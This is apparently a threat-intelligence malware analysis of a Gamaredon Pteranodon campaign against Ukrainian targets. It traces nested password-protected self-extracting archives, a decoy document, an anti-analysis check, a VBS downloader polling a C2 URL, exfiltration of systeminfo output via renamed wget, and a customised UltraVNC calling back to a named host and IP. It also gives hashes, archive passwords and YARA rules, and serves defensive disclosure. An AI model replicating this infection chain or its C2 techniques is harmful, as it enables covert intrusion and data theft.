At the final stage of this malicious chain, we found a customized version of UltraVNC, a well known off-the-shelf tool for remote administration, modified by the Group and configured to connect to their command and control infrastructure. Despite its apparent triviality, the Matryoshka of SFX archives reached a low detection rate, making it effective.

Stage 1

Hash5555a3292bc6b6e7cb61bc8748b21c475b560635d8b0cc9686b319736c1d828e
ThreatGamaredon Pteranodon implant
Brief DescriptionSFX file
Ssdeep24576:PXwOrRsTyuURQFsVhIe74lpyevrM4vZxn6k1gQ Guo:PgwRAyuURQ2/1YpyeT7ok8

Table 1. Information about initial SFX file

The mail attachment is a RAR archive containing a folder named “suspected” in Ukrainan and a single suspicious file with “.scr” extension. At first glance, it is possible to notice the PowerPoint icon associated to the file, normally not belonging to .scr files.

Figure 2. Content of malicious e-mail
Figure 3. Low AV detection of SFX malware

The file has a very low detection rate on VirusTotal platform: only four AV engines are able to identify it as malicious and only on engine understands it may be associated to the Gamaredon implant.

After a quick analysis, the real nature of the .scr file emerges: it is a Self Extracting Archive containing all the files in Figure 4.

They are extracted into “%TEMP%\7ZipSfx.000\” and the first command to be executed is “15003.cmd”, which firstly checks for the presence of malware analysis tools. If it detects the presence of Wireshark or Procexp tools, it kill itself. Otherwise, it copies:

Figure 4. Content of SFX
Figure 5. Script content in  “15003.cmd” file

At the same time, the extracted document will be shown in order to divert the user attention and to continue the infection unnoticed. This document, written in Ukraine language, contains information about a criminal charge.

Figure 6. Fake document to divert attention on malware execution
Figure 7. Execution of “winupd.exe” (SFX) and relative password (uyjqystgblfhs)

Instead, exploring the LNK file is possible to see it's able to start the “winupd.exe” file, with a particular parameter: %USERPROFILE%\winupd.exe -puyjqystgblfhs. This behavior indicates the “winupd.exe” executable is another Self Extracting Archive, but this time it is password protected.

Stage 2

Hashfd59b1a991df0a9abf75470aad6e2fcd67c070bfccde9b4304301bc4992f678e
ThreatGamaredon Pteranodon implant
Brief DescriptionSFX file
Ssdeep24576:bGKUQ8Lj7S6Jr1ye4SM4vzxn3k1jQ GujR:biJr1yeNxJkro

Table 2. Information about second SFX file

When launched, it extracts its content in “%TEMP%\RarSFX0\”, then executes the “setup.vbs” script, which contains only two code lines. So, the execution flow moves on “1106.cmd”.

Figure 8. Content of “setup.vbs” script
Figure 9. Content of “%APPDATA%\Local\Temp\RarSFX0” after “winupd.exe” (SFX) extraction

The source code of “1106.cmd” is full of junk instructions. However, in the end it performs a simple action: it writes a new VBS script in “%APPDATA%\Microsoft\SystemCertificates\My\Certificates\” . This script tries to download another malicious file from “http://bitvers.ddns[.net/{USERNAME}/{DATE}/index.html”.  Performing many researches abot this server we noticed the continuously modification of associated records. Indeed, the attacker has changed many time the domain names in the latest period. Moreover, querying the services behind the latest associated DNS record the host responds with “403 Forbidden” message too, indicating the infrastructure may still be operative.

Figure 10. Information about C2 and relative DNS

The scripts creates a new scheduled task in order to periodically execute (every 20 mins) the previous VBS script.

Figure 11. POST request sent to C2 with victim machine information

Also, it collects all the information about the victim’s system using the legit “systeminfo” Microsoft tool and sends them to the remote server through a POST request using the “MicrosoftCreate.exe” file, which actually is the legit “wget” utility. The response body will contain a new executable file, named “jasfix.exe”, representing the new stage.

Stage 3

Hashc479d82a010884a8fde0d9dcfdf92ba9b5f4125fac1d26a2e36549d8b6b4d205
ThreatGamaredon Pteranodon implant
Brief DescriptionSFX file
Ssdeep24576:Gfxwgmyg5EOJ+IIpBz2GAROm560XVEC1Ng MdfaQbhUfEIg+m:GJpgIdPzeRBJVEC1CMd

Table 3. Information about third SFX file

After few researches, we were able to retrieve the “jasfix.exe” file, the next stage of the infection chain. After downloading it, we notice that it is another SFX archive other files.

Figure 12. Content of “jasfix.exe” (SFX) downloaded from the C2

The first file to be executed is “20387.cmd” that renames the “win.jpg” into “win.exe”, another password protected SFX.

Stage 4

Hash28eff088a729874a611ca4781a45b070b46302e494bc0dd53cbaf598da9a6773
ThreatGamaredon Pteranodon implant
Brief DescriptionSFX file
Ssdeep24576:9GKUQ8vCTAaaJVssTk3OwO+vl+3yt6Xf IAR:9vaJes2Ocl7t9S

Table 4. Information about fourth SFX file

This latest SFX archive follows the typical pattern of the Gamaredon archives Matryoshka, where the “.cmd” file is in designed to decrypt and run next stage. This time using the string “gblfhs” as password.

Figure 13. Script to rename “win.jpg” into “win.exe”, decrypt and run next stage
Figure 14. Content of “win.exe” (last SFX of infection)

However, the file named “win32.sys” is particularly interesting: it actually is a PE32 executable file. Exploring the “.rsrc” section of the PE32 executable, we noticed different “.class” files. Two of them are named “VncCanvas” and “VncViewer”. These files are part of a legit Remote Administration Tool (RAT) named UltraVNC, available at this link.

Figure 15. Content of “win32.sys”

The “win.exe” SFX archive contains other interesting files too: one of them is an “.ini” configuration file containing all the parameters and the password used by the UltraVNC tool.

Figure 16. Configuration file used by “win32.sys” (Custom ultraVNC)

Finally, the RAT tries to establish a connection to the “torrent-vnc[.ddns[.net” domain, headed to an endpoint reachable on 195.88.208.51, a VPS hosted by the Russian provider IPServer.

Figure 17. C2 and relative port used by RAT

Conclusion

This recent attack campaign shows the Gamaredon operation are still ongoing and confirms the potential Russian interest about infiltrating the East European ecosystem, especially the Ukranian one. The techniques and the infection patterns the Group is using is extremely similar to the other attacks spotted in the past months of 2019, showing the Matryoshka structure to chain SFX archives, typical of their implant, but still effective and not easily detectable by several antivirus engines.

Also, digging into this infection chain, we noticed the come back of third party RATs as payload, a Gamaredon old habit that the usage of the custom-made Pterodo backdoor replaced few times ago.

Indicators of Compromise

Hashes

URL

Components

IP

Yara Rules

rule GamaredonPteranodon_SFX {
meta:
   	 description = "Yara Rule for Pteranodon implant Family"
   	 author = "ZLAB Yoroi - Cybaze"
   	 last_updated = "2019-04-19"
   	 tlp = "white"
   	 category = "informational"

   strings:
      $s1 = "SFX module - Copyright (c) 2005-2012 Oleg Scherbakov"
      $s2 = "7-Zip archiver - Copyright (c) 1999-2011 Igor Pavlov" 
      $s3 = "RunProgram=\"hidcon" 
      $s4 = "7-Zip - Copyright (c) 1999-2011 " ascii
      $s5 = "sfxelevation" ascii wide
      $s6 = "Error in command line:" ascii wide
      $s7 = "%X - %03X - %03X - %03X - %03X" ascii wide
      $s8 = "- Copyright (c) 2005-2012 "  ascii
      $s9 = "Supported methods and filters, build options:" wide ascii
      $s10 = "Could not overwrite file \"%s\"." wide ascii
      $s11 = "7-Zip: Internal error, code 0x%08X." wide ascii
      $s12 = "@ (%d%s)"  wide ascii
      $s13 = "SfxVarCmdLine0" ascii
      $s14 = "11326"
      $s15 = "29225"
      $s16 = "6137"
      $cmd = ".cmd" wide ascii 

condition:
      12 of ($s*) and $cmd
}

import "pe"
rule GamaredonPteranodon_SFX_intermediate_stage{
meta:
	description = "Yara Rule for Pteranodon implant Family Intermediate Stage"
	author = "Cybaze - Yoroi ZLab"
	last_updated = "2019-05-31"
	tlp = "white"
	category = "informational"
strings:
	$a1 = {56 8B F1 8D 46 04 50 FF}
	$a2 = {14 7A 19 5D 01 EB 18 02 85}
	$a3 = {0D 4D 38 B1 2D EE 1E 2B}
   	$b1 = {34 9B 43 00 50 FF 15 30}
    	$b2 = {AB B9 89 97 2F DD 7D 82}
    	$b3 = {9D CA C6 91 EF}
    	$c1 = {24 0C FF 15 34 9B 43 00}
    	$c2 = {32 31 32 F0 32 2E 39}
    	$c3 = {45 3B 4B 21 A7}

condition:
	pe.number_of_sections == 4 and all of ($a*) or
    	pe.number_of_sections == 6 and all of ($b*) or
    	pe.number_of_sections == 6 and all of ($c*)
}

Acknowledgement: special thanks to @JAMESWT_MHT for info and samples.